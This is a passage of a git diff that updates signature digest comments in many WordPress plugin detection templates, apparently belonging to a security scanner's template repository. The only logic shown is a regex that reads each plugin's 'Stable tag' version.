@@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f748cee4171e321efad955f0b254111524951d9f7be6724adfad319b4f172278022100e15cff02d23be4358ed237888799c5059222d7934563f6d4eff8453ca4acbd49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb9f1bf8be4948c93a575a151b5400844ec16dea1660c19526a376dc8048027e02206a37e2100df90bb0bc02a523e3726c865eee24148ae9f495a8554de43bedc6af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 317d724daa..0ff456436a 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202f8d7f4ddb1d95e4b5090d5f0b3100ef870738c42d7a081373bfc0f027ff949102202089bfa39f79698aa1f775466065edf86e1d73dfed8dcbd9282dcf682ee3099f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b7713f82feef41e441548ded3b1de5e7a2e0be604a89a6f25296f1b45f38a24022100cbc7216cb44b015e3f2e437eca310a9dc6ff9969c938a0ee77236f821066a177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 619d648760..9282fe08af 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100dff3bf21e864b5986eda02a147c1122457f5076a07c27859fec4d7c7426dc74d022100840bc49273709165ab60e73754234940536fe5a032fb27d2a7f316ef373a4450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083c86975b865dc4064346398c9badd7453379c90eacf1e75a80b04843afde105022100ac36693591626c21dade086c6504ae8a7f2569cdb6a280bb0237cccef029310b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 16da9f6eb8..e9a9cf9abc 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220015c7203e4be0978773e393dcfa204a4617b5472a963997886a961c3d877f58c022100c7f987322e72156198cb7e8c49626955e1d0ca902f694dcd85f1eeb3bfb97328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220404a3e08934dee9dd44a5b858d98212c32c0607d54263ba57d1a5c9e38d40603022100fe036551dc671a6dc0db9de7d455e127c2a5f8f0f1d17b29a04bd78acca5f95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index db78d62276..b886b12f1b 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009e11ddfce34ae526181d15dc7b8a96a9f515db3ab7ab9a4b14b43c410b155777022007b0db9fc78b12a6ce2432057e9caad06ef9fb1eea8120d9fe9feac692630c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cdff53617aa5526bc90e4cd983455e4e045cd3624b4ce0eb1d14bcdaa8b5665f022028f53847046f791de1f75642d78332496fed70e677502f24f6fee6e5c653745d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 3cfca17a3e..6ac4f817e7 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022024eedd90c41426b1bf84889f09d322e07dd74510f44f444a74689385bc2895a502205ed64401c7e35cf0b785e7068ef03a6244bb7742d3d07b650d27a9eb5c9e91b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0edf66b134cdf136f11ae28a1e40e78074ae50255db9f6a46376c14876619f9022100f37f512f70a3944173db3f172334ff79a4ec175744da95b5984ccbfb6cb67682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index f6f3541f71..c4b3d7e66d 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b9fea48031538a15f4fa956090c50159793c9dbc980ec12ad89ab59d865629ed022100f78fefecb9a9eb95d383be020ea6b76fd91ce2fccb53929507d733872ac78c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220513774fe614438da1a0ddf1fd232a4b03c8654bae2a74180cd534b76fe68dc2902207f44251d19aff86aaa22971c747c6a705fce436bd79752b041c7ebbf03159ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 53ad504b07..ac5aeff506 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200d9239d47968836413cb7b1331d801d5e6705316c1cfc7d1bd24577a2705267302202b57e03feb4faab1d3fd5988501a32d7584deaade635387bac995ed84f06d277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ca3871ed2a67b865004adfdc8e09d434599756cf4bfb9f422124283ad32cb0d022100c4106aa33ad9dd441c99b900767a4f08bd5e4387c0f4c639f6f929d17590ae12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 50877768ba..ab7020a229 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fded626917992eb27ab5c2f23088c7c413bd7103b2d0ed015505253b863f0715022100deffcf4a8d851c2e22f588be0ee4e478174a8a1f3c6b6c591785d2c85cdcb0f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205931f78e5df15291a1a40a66a1baa9573e87d46b568aea1d3f5467e3de5bb9ba0221009d1539b80e8d87f7f08434d142a0b94d952bb88a8c866cf618f12625c65ad120:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index d60b90b48e..14090ec9ab 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206417236e32cf70ef8b3bc1e7bbbe1373f6927904dbba4669696f28a7c1a06827022100a04ccba126912ccda40f5d86f7ad49ea2832665464f3a612eca9fd02e39a86af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c283bb6adc9f31392be325580797424331246b9caa8d67c7902e1ac4cede044022100eddedd991398fa7fa788e0daf0edddfe9e15163ee4031d2deeb41d605b08395e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 5c42848763..8f9ab7c09b 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201e434decc67fadc6afa3004faa63bb6a7ccce10e5cef119a2af66951d85c6d6b022049f564b7bb1d2221f579d1bc7d353495f89975019001abc3a8d77af01931a230:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e1a413712f73acc38ae62a45bb9d11d07d2d44060fdd0cff9fd5ea7a2053d01b022100a82002297d529bb08a7a5dec0b7724f8b6218d8815abadfdba7fce4a17056df7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 281d8df0f9..49c6b755df 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e11e5d35bf7231a501b723af75618382fcd0432829de261e733ed2168df86e7802204bdd97860034972ea6b922229c561e1125d98d287dcd96dc118e949094651437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a48f80f5aae326a737c927d7f8dde8439c04303b0955206cea29e04474093940220516247faf3e6efe7ee8ff80a7bb7ca67997864670596a2d8d22c0e25f10f727d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index f8aefa350d..5c88c05a15 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e523c96a093718fafe1642a2abe153d1d50fea36e3e0b83a3ba2cfba738f576a02207c9feb3bfa6201a6452d1d1e7f32e0fe200239102a0ff18a87fe8c199db86feb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051f45470d4b994b9cffa8dfad3dca2a672406abafbe99c12e4455e4240e50131022100983f2c101139a688477954b5f795e72a7f2f5182494de4bea8fdbe289cb8ac0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index de3f9db093..0c3b6871a6 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f257b874b084b2dd9094cd68962759523f67e0133dd5979bfee375fc75cd11d7022100f49c912a6bc394178a08b2999b1116ef92ace9bc0ab7408e4fbcad1b18f229c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8e97b120564b0d03a7515cf705afc81067cfd60010b320dee1a821582187fc6022034fe05db650bff9afb095a8ba7b10de84606a8b9edb12fe6ab6ec982d80f672c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 53be27ced2..b0071c643b 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220165521106bfee3275e2c19b23b8128a44c3541f780bd96528555bcf2d4c116bc022100dc1caa92c726f7c64184a4a8bebcd7dce9480c7dad4308540b898dd05b1f5fd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f856450876c1be4524a4267715ffb9f671bfe34ff0e72ed62ac81ee86761b5502205baab5059419d05b06f9e3f2069a3b254b26759f4e873f5752e414895c7ddd1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 61b25a4bb1..c7ba27ede2 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210089da94a576544bf5ae5f98c6110f58c867baf236eaf0d398c4636979e7c3e22602200a5035ebbb9506acd1171d58881cedeb7841a3a7f519725b96b376d17c5c368d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bdd6ae323f771126a52918821cf3cc655e056e3ffbe7b4ee9a65f763572ddb9802202e0fbd9aea30c9906b83ac60a265ee07d11b3009efda2f6a43cb87305852dfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index df3bf78d7d..a320dd43bd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fb331aeedf36a40328bb0ed5d019f3962679ba6de56123c7ea56bfa20e693bb5022100cc892149c96a230fa8a16179b27045a39b4dec487a9a3827e204e96ab3b047cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204b7bc42e63bcbdff7cc7bd7dba639591073012bcab54bd73f6f141b4613dddb2022100a2a901b9d5f42551ffed1790b7f7ce075366e7fb59df441bedf104404c3b83a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 99c26d013f..f0fcc8be22 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203c003572de37ac34822997eec8e22a4e7b1581bce841954f62715829c24cfbc4022100a9ff9014521481c638c246cece1c1ad4119b10745f0ec3f202231618f0045ef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203ad47ed4dfb36ba96b80351f5518043664c78eb2105988029d38a3dc811b2fc802205b6e74beaf2eae5e389a93bc18705d8915b9657a1b1f68a593eb5973b0a8fe3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index b357cb5927..b1187383f3 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008b01ec8f13f7c80b389a7a3274c30ef3ed8ef9a383211b4c1684087084603dbf02200db252eb3ce3579e93e6ce27f57e620786951c73524c35c209dbe6ea86d64f8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0d60c084d61fc1784cd0aeab8903ed594a68116df6d84ec3825acd1df2cb17a02206ab48a14c849ccab56f9cffd97baf38ac0cd483a7b8ba7f8c9ca7b49b5354ba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index c37177cdb1..b91ddafd8a 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206d279da4c419adaef2174322867144c9c6e869513a7cbbff8aa85d0c4687673d022100d013ade7cdebd73d1ba2b99a8d419a0d3ed7411d6da5a0c9ea729b8270fdfb37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d07ce80dd6c39ec355f2c341b94f10c4a6596bf0bfcb6eea7bef60a4246426a0022100e9bc46ad5eb2808300d14962115ad296baaeb8c326a7cfc3577c8dc2820d7260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 1bd3a8c9c2..aed0078e88 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203ad26797e284d5d6bf9ba760a9f1ebd1fcd3e9bb542f1e7cae6388bf038c77cf022100dda3d5e1d765631fa9bff92cc5f1fa471262350f5c5662aa79ed44bd085dd9ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022053bc6430b79017b69514ebe0a62a61d4b810e11cdc149d626c110b0a79fef8ed022017a30f0035c8fe53c668049e17e0b9f3c074c01c9012bfd6937cdbd7321f2e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 53d9407cac..29a13ac406 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207cbf63415009b450fc727ebb905bb5928721a63bce963382e0cea608721ec838022001da84b21f758409350ef9aefb229cb447a0f31c46e6c85f8111be52109a7191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085779038d85c961f1f515f6a6d9ae46290a02ea5f1db71e36be4fda05a901b8202203d7b39952fa7ac206b2fae0d679bbaa5e9910afd8736db5f1224a83c14ba08c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index f7892c9ad0..df9f1b6e31 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206ff7abf5a06dc291898cf58292819ee1a75959fecf20f2e7d03c8fcfd9bf654a022056dad4446abbcb65b9f71c3fafed1d2a9f0798e238639a00ff25a6cab0cde30b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebe9d32f7963de805a9574cfcc9bd6f093cce3e4648c728d44a5a1b943148de402201f55e6496a5dfee35ce49510b9272c094097ee980eb7a996f6ef32032925b7a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index e9a461e881..13625b21ee 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f21f018dcdb11d9db41b19e923102446a0c838c960a6ffb737d5f8970c8e46e20221008c2f9eb745eaa1e9cfbd23eb8bbfc5d97ae84761cf8d2bf41b1cfe779dcd884b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a3c8be9eed71c6fd70506ff56f6df4b9176c7bc41751e99136471e065fba0585022100ca7c4f8c85336262eee7e41434589990783259070d60d8e8d9231cec389a0ded:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 30cf3ba70f..bb5b49c350 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022004e4e4d08ef05bfaa718368711d85f53d534eb3271451cab2186e9d08d778203022075d83d3b3031cd0966b7de1a6e5e3e67ffaee3a813b7d04dc6ccbbbe19966883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aed447dbaba4dab56ec68a592f965993d29636e009cacbda0ff25ccff11287d1022100b9f2550b6ab9a216d76b4807374257a555dbe5d82dc2948e74db056c3afd0ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 6211154a53..1bb56a1735 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205a025375f3877c16455d187ff2a3249e3f63e4dd3f1422476c85783b86ca325302201e9712acd5ba577ba2c348f1ccab577c9e67efb29d5a7fae7bb5bd47a6116a8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059d50aeb704c97254099755af19216ee2a8df3b4ab361befbe6eceeb55b0ca8e0221009ad8fb437176840a474ecd27675f0378c66dafb552e05298a30f00c53511309c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index bbbf42308b..7d286359de 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100bb06d6a8461908b031e9db1131959d31f450cbf6c75ecc10446da5fec50bb784022036cd3cd416e86449592cda9745603dee2e1db545eadb2d23bf8f1015665bcbc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207140d559920dac35ffeb93ea989b421868fc37f9ea61995b94062370c48b390502210096ff728fae0d0e5b7110d9ca1c50c606a7f97899bcbf1bf0a385c6f185a5b730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 80b35751a3..16eb659e32 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e40f9599b49b4c2dbcd701b8ddb012a5472960af7a8277f8755c5531b859e10802201092a2afa9be2de8506235528a9f050ea8e4382b6af486fffc3872c4334b4a0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a82ddebf9dd2c72897c0932cfbdddba926cc2b67f6dbd1602e54a09859d08ba022028cc28999a0884b19790c8f6d3c4ec8c50f5cb49ce470ede25e0286edc10e2b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 695a8af76e..cd44590429 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220744df0cb20140b539c6101dc7482d2bba305e9d85d8c069a502368ddb4671a4402203de8ab89b46bf1743f2681f616bafa628508834bec0830094b8947016a1b3a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220464ecd1f1ab445d15e0c71b464c772cdccfe175c981ee6c6a2a2689d7d9c2d390221008190bc394fb79b775b836d91b9cb1ae0259222d7c15ee425e8a8bc74975b18ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index dd4b805142..8dd7a83de5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206fce741fb20bde0d8f9104f9c12c48d57c23e38dcb273a68d73d077c49aa4a09022100ad4efb927d43c3c6bc2037b3c48128a21f7f8272aff202bfbc7ea16413f91f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb037210d39b82095d8199f3680f3ad1520d7005066026945d02d2ad4b33bcce022100ce11ae65772855d295b35625c27974db06208b2160c4e257476718352c49abce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index e381b34c91..7759c2ae17 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d207da09656752159fe9d96f565d5c5ba1e653f55595acba44e1593532730ca6022045a93b5fae90609e1d7a962d5009b7d5724b751466cd04e6625fcc8199af4c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220225c20dcb55e389db51d4b87cfa905aaea766ed59b30470d0614075a5742919b022100af257761e92fb8d5888922f756c1789ccbc0563aae1b78260877c309288f035e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 720331293d..ff1aa86f90 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022033384196f5dbadcde1bf5bd7693aac831f04b34038a487b183a1f811808245360220443f8c5067a1eae81dd363fb78a2eb2500a34695a23596e96765ddf2581aeb22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008fcc7060507841eec1f156c1eb72f4090c57e9af3dd290ddedc1a32bb2c90ceb0221008b652d2bfcd6067999cf7ec1fc484f2579e0da1134efde6b080c774c17bb961f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 588169f6a9..6f42a03434 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c77cb46a8b6fff1e69e361286e81481729b851aefeefb65df6edfaa107a6df3b022100c92a9ec5bf7d29cd71c5e47c078ae7b488e8a4d46c18113afe8b4fabae7ad18e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202635747f7e9fa1748d890c1617386c3d0ede09582969a6a6e41c42b0bd4813ec022035a4904da0a326ed56766a21191863eb2cf08c3e90aa6b1df4e102d22f6610a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 1e86b9eb8b..bc85650769 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200e8cdcf6f67b46bbf8c24dc64c2060f55419197e2f47d5e27185bdc7eca41ca0022100cec20f12fffe989f0cf442d243bc5a0662d40b283edb9213d2c0b8a1e2835aa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220635ffa156ce9c553ab286fa8687b68a2486d540d7c80a6450949efb415748a5a022100b7bec3260aae6916c7d74a3fe3dfbc6e6d9a417ac878108b70754e133a54bc46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml 